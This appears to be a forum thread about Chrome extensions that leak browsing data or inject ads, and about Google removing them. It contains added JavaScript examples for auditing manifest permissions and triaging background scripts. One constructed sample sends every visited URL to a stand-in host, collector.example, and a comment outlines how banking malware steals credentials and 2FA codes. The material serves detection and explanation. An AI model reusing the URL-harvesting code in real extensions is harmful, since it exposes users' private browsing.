The Quick Note Chrome extension from Diigo (now removed) submits every URL visited to a third-party server and those URLs are then crawled the next day.
We just switched our 25 member customer service team to Chromeboxes and were very concerned to find soon after that an EC2-based crawler was querying private URLs of our platform.
Because the Chrome Web Store had not banned bad actors like Diigo, we have now blacklisted all Chrome extensions except for a very small number that I personally approve. Rather than feeling that ChromeOS was improving our security, we had our chief software architect spend most of the weekend figuring out who was targeting our platform. (All queries received 404 errors, but we remained concerned whether the rogue extension could read the submitted form credentials or the cookie store to get access.)
Rogue extensions are wasting a huge amount of time and destroying trust in the Chrome platform. Here's some more detail on similar stories about Diigo:
https://chrisa.wordpress.com/2014/08/25/chrome-extensions-go... https://mig5.net/content/awesome-screenshot-and-niki-bot
I am thrilled to see Google finally acting to restore trust in their platform.
Update: Google removed Diigo Quick Note, but still has Awesome Screenshot <https://chrome.google.com/webstore/search/diigo?hl=en-US> which captures the identical data and sells it to third party crawlers.
It appears to log what actions each application and extension performs, view permissions, and debug the extensions' background pages.
I think one of the worst things to me is the number of drive-by installers that now target Chrome, Firefox and IE with malware extensions, or transparent proxies. I saw one on a friend's son's computer and mainly noticed because there were additional ads on Amazon's site. Sometimes I think we should bring back outlaw (dead or alive) status for certain classes of criminal dregs on society... Then I think about where the likes of Snowden would fall from the government's perspective and think it over again.
I don't think their URL scanners are clever enough to dig through emails and try user/pass combos
The answer is for Google to own what is in their store, but that costs money.
Which is usually accompanied by the developer apologising and explaining they have to declare this in order to provide the extension's core functionality. Users then learn to ignore these warnings, malicious extensions ensue.
I'm glad Google is taking malicious extensions seriously, but purging is a difficult semi-manual effort when extensions can update any time. A lot more effective would be to bake security into the whole model. Extensions shouldn't need to see your entire browsing history on all sites just to enhance some links or do syntax highlighting.
It should also be possible to request permissions on demand, and for certain URLs, instead of blanket-consenting before the extension is even installed. I know these things are a trade-off with simplicity, but should at least be there for orgs and individuals who want to take advantage of them.
Chrome extensions can request access only to specific URL patterns, so they can be fine-grained about location, but the actual permissions tend to be coarse-grained. And as a user, you can't change the URL pattern (that's some low-hanging fruit right there: users should be able to edit the URL pattern for any extension).
In some respects, Chrome apps are morphing to be general websites (e.g. with manifest.json and installing to home screen on Android), so hopefully things will move more in the direction of the web. There were also some hints towards on-demand permissions in the security talk at the most recent Chrome Web Summit, I'm not sure it's proceeding.
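An added example, written for this thread rather than taken from it or from any Google code: a matcher for the host patterns discussed above, plus a small manifest audit that sorts declared host access into broad, scoped and on-demand. It assumes Chrome's documented match-pattern grammar for http/https (`<scheme>://<host><path>`, `*` wildcards, `<all_urls>`) and the manifest v2 layout, where install-time host patterns sit in `permissions`, content scripts carry their own `matches`, and `optional_permissions` holds patterns an extension may later ask for with `chrome.permissions.request()`. Both manifests at the bottom are constructed.

```javascript
// Added example (not from the thread or any Chrome source): Chrome host-pattern
// matching and a manifest audit separating broad, scoped and on-demand access.
// Assumes the documented http/https match-pattern grammar; manifests are constructed.

function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Parse a pattern into its parts; throws on malformed input so an auditor
// never silently treats a typo as "matches nothing".
function parseMatchPattern(pattern) {
  if (pattern === "<all_urls>") return { allUrls: true };
  const m = /^(\*|https?):\/\/(\*|(?:\*\.)?[^/*]+)(\/.*)$/.exec(pattern);
  if (!m) throw new Error(`invalid match pattern: ${pattern}`);
  return { allUrls: false, scheme: m[1], host: m[2], path: m[3] };
}

// Compile a pattern into a predicate over URL strings. Chrome matches the
// path part of the pattern against the URL's path plus query string.
function compileMatchPattern(pattern) {
  const p = parseMatchPattern(pattern);
  if (p.allUrls) return () => true;
  const pathRe = new RegExp("^" + p.path.split("*").map(escapeRe).join(".*") + "$");
  return (urlString) => {
    let url;
    try { url = new URL(urlString); } catch { return false; }
    const scheme = url.protocol.slice(0, -1);
    const schemeOk = p.scheme === "*" ? scheme === "http" || scheme === "https" : scheme === p.scheme;
    if (!schemeOk) return false;
    if (p.host.startsWith("*.")) {
      // "*.example.com" matches example.com itself and any subdomain
      const base = p.host.slice(2);
      if (url.hostname !== base && !url.hostname.endsWith("." + base)) return false;
    } else if (p.host !== "*" && url.hostname !== p.host) {
      return false;
    }
    return pathRe.test(url.pathname + url.search);
  };
}

function isHostPattern(entry) {
  return entry === "<all_urls>" || entry.includes("://");
}

// "Broad" means the extension can observe every http(s) page the user loads,
// which is what the "read your browsing history" install warning reflects.
function isBroad(pattern) {
  const p = parseMatchPattern(pattern);
  return p.allUrls || p.host === "*";
}

// Classify the host access a manifest v2 declares: install-time patterns in
// "permissions" and content-script "matches", on-demand ones in "optional_permissions".
function auditHostPermissions(manifest) {
  const installTime = [
    ...(manifest.permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ].filter(isHostPattern);
  const onDemand = (manifest.optional_permissions || []).filter(isHostPattern);
  return {
    broad: installTime.filter(isBroad),
    scoped: installTime.filter((p) => !isBroad(p)),
    onDemand,
  };
}

// Constructed manifests: a note-taking extension that asks for everything at
// install time, and the same feature set scoped to one site with the rest
// requested on demand via chrome.permissions.request().
const BROAD_MANIFEST = {
  manifest_version: 2,
  permissions: ["tabs", "<all_urls>"],
  content_scripts: [{ matches: ["*://*/*"], js: ["content.js"] }],
};
const SCOPED_MANIFEST = {
  manifest_version: 2,
  permissions: ["storage", "https://*.example.com/*"],
  optional_permissions: ["https://*/*"],
  content_scripts: [{ matches: ["https://*.example.com/notes/*"], js: ["content.js"] }],
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(auditHostPermissions(BROAD_MANIFEST));
  console.log(auditHostPermissions(SCOPED_MANIFEST));
}
```

Run it with node and the first manifest reports both `<all_urls>` and `*://*/*` as broad, while the second reports no broad access, two scoped patterns, and one pattern that the user would be asked about only when the extension actually needs it.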
1. The user logs in to his/her online banking website.
2. The malware gets triggered and phones home with the user's credentials.
3. The bad guy logs in using the user's credentials on his own computer.
4. The bad guy initiates a bank transfer from the user's account to his account.
5. The bad guy is presented with "enter auth code" to confirm the transaction.
6. The malware pops up "Verify your auth code" on the user's computer.
7. Thinking "it must be a new method from my bank", the user types his/her auth code.
8. The auth code gets sent to the bad guy, allowing him to complete the transaction.
9. Profit.
Even tech-savvy people can be victims if they are careless.

AdBlock is very clear in what it does and users install it because they want to block ads, whereas users are usually not aware when an extension injects ads. As a note, the Awesome Screenshot extension for Firefox asks you if you want ads injected, probably because of Mozilla's review process, whereas the Chrome version does not.
It's one thing for websites to be robbed of the opportunity to make money from your eyeballs, with your consent; it's quite another for those same websites to unknowingly generate money for an obscure third party. We are probably talking about copyright infringement done for commercial, for-profit reasons.
Google is annoying me lately. I now use Firefox on my Android and I do that because AdBlock Plus and uBlock are working on it, whereas Chrome for Android still doesn't have plugins, probably because they don't want ad blockers in it.
"I spoke to the team that maintains that list and they don't have plans to make it public, if you would be willing to share some ideas on how to better protect people from this unwanted software I would be happy to pass it on but due to the nature of the work (trying to stay one step ahead of bad guys) we probably won't be able to share anything back."
I'm the author of this anti-adware addon called "Extension Defender" and it would greatly help my users if I could use their list, because while the extensions were removed from the Web Store, does that mean they were forcibly removed from their PCs? Probably not.
Plug: https://chrome.google.com/webstore/detail/extension-defender...
Interestingly enough, Vosteran also produces a rogue fork of Chrome which makes Vosteran's own search/ad platform built-in and unavoidable. Said rogue fork is also installed without users' permission.
https://chrome.google.com/webstore/detail/vosteran-new-tab/o...
I invite you to peruse the first five pages of search results here and make your own assumptions about the legitimacy of all its five-star ratings: https://www.google.com/?gws_rd=ssl#q=vosteran
I just can't talk myself into the "This extension will have access to your browsing history and private data on all websites" warning that appears beforehand, and it looks like with extensions sending private URLs away to be crawled, I was at least a little correct to worry.
How might they have detected what extensions are installed in their visitor's browsers?
Is there a way to enumerate installed extensions?
http://browserspy.dk/ and https://panopticlick.eff.org/ detect plugins, but those aren't the same as extensions.
I forget the name but I had one that allowed for a custom new tab page. It had opt-out ads, but I otherwise loved it. It kept getting disabled after each fresh start of Chrome. Debated forking it but haven't yet.
It might matter that I do have my extensions sync between machines. Extension is eventually disabled on the others as well.
EDIT: "This extension violates the Chrome Web Store policy." The extension is Modern New Tab Page. The store page is gone, so no clue what policies are violated, what I need to fear, etcetera.
I can still enable it, but it will be disabled at some point.
Does it have questionable practices? Yes. There's a settings option but it's different than the settings I see by going to chrome://extensions/ as the sole option on the latter is to disable ads.
EDIT 2: To be clear, this extension was blocked late last year, and is not part of this recent batch. At that time there were questions about whether there was a list as well. There was, like this time, no notification to impacted users.
As an aside, I'm surprised at how willing most users seem to be to install any software, be it browser extensions or random apps on their phones/tablets/PCs. Especially in the case of deliberately malicious extensions mentioned in the article, I wonder if they were installed without the user ever considering "What is this for? Do I really need it?"
How? Among the biggest offenders are extensions whose expected behavior is to send large amounts of data to a remote server to be used on your behalf, but which then actually use the information for other purposes, sell it to others, etc.
Examining the client side JS will never tell you what the back end is doing with the data, only what data is transferred, and so won't identify this kind of nefarious behavior at all.
What infuriates me is that even extensions that are widely known to have succumbed to these sinister offers to include borderline malware in their extension, such as Hover Zoom, are not punished in the slightest even after being caught, or even required to remove the malicious javascript snippet.
What the hell is the point of all these XSS prevention measures in modern browsers, such as reflected XSS prevention, CSP, script nonces, etc. when all you have to do to bypass all of them is make your own browser extension? Is the team at Google that handles Chrome extensions completely unable to communicate with the team that handles browser security? The left hand has forgotten that the right hand even exists. I nominate Google as the company that the movie The Cube was warning us about.
If the suspiciously nameless author of this article wasn't paid by Google to write it, then he ripped himself off. If the author had performed the most basic research into the topic he was writing about, he would have learned that Firefox's approach to extensions is perfect and is the only reasonable solution to the security problems that exist with Chrome's extensions. An actual journalist writing about this topic would have swiftly concluded that Google should be lambasted for its blunders and mocked for not living up to Firefox's standards, rather than being borderline worshipped for barely doing anything to fix a horrific problem they openly invited in the first place.
Enjoy your walled garden. Soon enough the walls will be so high you won't even remember what a free browser felt like.
Not on Chrome stable. You have to use beta, dev, or a Chromium build for that.
That being said, your walled garden notion is accurate. Chrome used "security" as an excuse to lock down the extensions platform to only their Web Store. But it's not any more secure, since there's plenty of malware in the Web Store. It was just an excuse to wall in their product.
http://extensiondefender.com/blog/red-alert-dangerous-exploi...
Browser extensions offer a whole new host of evils, along with a marginally effective way to fight back against the rising tsunami of web horrors. The web is mostly about harming users, so I can hardly blame them for grasping at whatever chance they have to defend themselves.
Browsers are for interactive documents; for everything else there are native applications, even though I also do web development gigs.
You'd then have to go to a screen on your computer with that particular transaction, find it, and enter the code. You don't suddenly get some kind of authentication pop up, and know to enter a particular code that authorises anything that isn't your password. That's the whole point of 2FA?
Beyond that, it's surprising that bank fraud still happens seeing as in most countries there are very strict KYC/AML requirements, meaning you can only open a bank acc with an ID in person, with a registered address. I got hit by this myself a while ago when I sent some money for an online purchase that never delivered. I was really bummed out, got scammed but thought at least I had an acc number with a name and address. I looked into it more and it turns out there's a big network of low-end criminals who will approach some 16 year old on his way home from High School. He'll have $50 on his account. Is given $100 straight up, and promised $200 additionally later on, in exchange for his debit card. Youth thinks 'why the hell not, got $50 to lose, just gained $100 and potentially more'. The criminal will use that bank acc to collect money, retrieves it from an ATM with the card, then disappears. Police investigation into the scam will turn up with a 16 year old unaware of the risk of 'identity theft' (weird semi-bs concept itself) who lent out his card and didn't understand the consequences. The criminal goes free without a trace.
Extensions are Apps.
Without a meaningfully robust (and mandatory) security model and some basic security audits to prevent over-reaching security defaults/requests, you might as well be running Windows XP.
Ghostery has a bit of a different model, but they're no saints: http://www.technologyreview.com/news/516156/a-popular-ad-blo...
I guess the lure of selling usage data is just too great for any commercial entity to control the source of these ad blockers. uBlock and PrivacyBadger are still clean AFAIK.
I use a couple of them at once, block most JavaScript, usually run with cookies disabled, and pay a bit of attention to what's going on in the privacy news. For less tech-savvy relatives, I just install Ghostery and disable third-party cookies, since that seems least likely to break websites, and blocks most of the worst tracking.
Oh, and hosts-block tynt. Those guys should drown in burning kerosene.
Minified and obfuscated JavaScript is not much easier to check than binary files, and more difficult than e.g. Java class files, at least without ProGuard.
Instead it is far more likely for the extension to make the requests from their background page (which has elevated permissions) which is essentially its own page with its own inspector. You can inspect each extension individually by going to your extension listing, enabling developer mode and inspecting the background page of the extension you suspect.
EDIT: here's how to inspect extensions you're curious about: https://developer.chrome.com/extensions/tut_debugging
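An added example, not from the thread and not modelled on any real extension's source: a first-pass static triage you can run over a background script pulled from the profile's Extensions directory (or copied out of the background-page inspector described above). It answers only the question client-side review can answer, namely which APIs let the script observe navigation or cookies and whether that is wired to a network sink; what the remote server does with the data stays invisible, as the thread notes. The two scripts are constructed, and the API and sink lists are heuristics I chose, not an exhaustive catalogue.

```javascript
// Added example (not from the thread): heuristic triage of an extension's
// background script for navigation/cookie access wired to a network sink.
// API lists are assumptions covering common MV2 calls; sample scripts are constructed.

const NAVIGATION_SOURCES = [
  "chrome.tabs.onUpdated", "chrome.tabs.query", "chrome.tabs.get",
  "chrome.webNavigation.onCommitted", "chrome.webNavigation.onCompleted",
  "chrome.webRequest.onBeforeRequest", "chrome.history.",
];
const NETWORK_SINKS = ["XMLHttpRequest", "fetch(", "navigator.sendBeacon", "new Image(", ".src ="];
const CREDENTIAL_SOURCES = ["chrome.cookies.", "document.cookie"];

// Drop comments so a commented-out XMLHttpRequest does not count as a sink.
// "//" preceded by ":" is kept so "https://host" in string literals survives.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, "").replace(/(^|[^:])\/\/[^\n]*/gm, "$1");
}

// Record every line on which one of the needles appears.
function findAll(src, needles) {
  const hits = [];
  stripComments(src).split("\n").forEach((line, i) => {
    for (const n of needles) if (line.includes(n)) hits.push({ api: n, line: i + 1 });
  });
  return hits;
}

// Host names the script talks to, for comparison against its stated purpose
// and the host permissions it declares.
function remoteHosts(src) {
  const hosts = new Set();
  for (const m of stripComments(src).matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts].sort();
}

function triage(src) {
  const sources = findAll(src, NAVIGATION_SOURCES);
  const sinks = findAll(src, NETWORK_SINKS);
  const creds = findAll(src, CREDENTIAL_SOURCES);
  const hosts = remoteHosts(src);
  let verdict = "no navigation data leaves the extension";
  if (sources.length && sinks.length) verdict = "observes navigation AND has a network sink: review the sink payload";
  else if (sources.length) verdict = "observes navigation but no network sink found";
  else if (sinks.length) verdict = "network sink without navigation access";
  return { sources, sinks, creds, hosts, verdict };
}

// Constructed: the behaviour the thread attributes to Quick Note, reduced to
// its essentials (every completed navigation is POSTed to a remote host).
const EXFIL_BACKGROUND_JS = `
chrome.tabs.onUpdated.addListener(function (tabId, info, tab) {
  if (info.status !== "complete") return;
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https://collector.example/urls");
  xhr.send(JSON.stringify({ u: tab.url, t: Date.now() }));
});
`;

// Constructed: a note-taking background script that only touches its own
// storage and talks to no server at all.
const BENIGN_BACKGROUND_JS = `
chrome.runtime.onMessage.addListener(function (msg, sender, reply) {
  chrome.storage.local.get("notes", function (data) {
    var notes = data.notes || [];
    notes.push({ text: msg.text, when: Date.now() });
    chrome.storage.local.set({ notes: notes }, function () { reply({ ok: true }); });
  });
  return true;
});
`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(triage(EXFIL_BACKGROUND_JS));
  console.log(triage(BENIGN_BACKGROUND_JS));
}
```

A positive result is a starting point, not a verdict: the next step is to inspect the background page, break on the sink, and read the actual payload, since a legitimate sync feature and a URL harvester look identical at this level.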
For all the things I didn't/don't care for regarding flash and silverlight, having a single compressed downloadable package is a nicety. I think Silverlight did a better job of it though. When Adobe bought Macromedia, my sincere hope was that they'd turn flash into a more open format that was an archive manifest with svg, mp3 and other assets with closer to plain JavaScript for their part. That could have been something browsers would be more likely to have embraced.
Websites are different probably because it wasn't Google who designed their model, thankfully.
Okay, so it's malware. Let's check out their webpage[2]! Hm, they give a physical address at 28 Lilienbulm St. in Tel Aviv... as an image, to avoid search engines. Let's look at their "how-to-get-rid-of-this-crap-I-don't-want" process[3], which "shouldn't take more than 10 minutes": so they basically put their tentacles into any crevice they can find, and make it annoying to pry them out.
Let's see if it's easy to see who runs this bit of evil... nope. They're amoral scum.
[1] https://en.wikipedia.org/wiki/Browser_hijacking#Vosteran
Not sure if any of that still works with GVoice, but if not, I'd look into doing it with Twilio possibly.
And it can sure handle js uglify, etc there are tools and systems that allow you to remove more than that and then it becomes really difficult to get a handle on WTF is going on.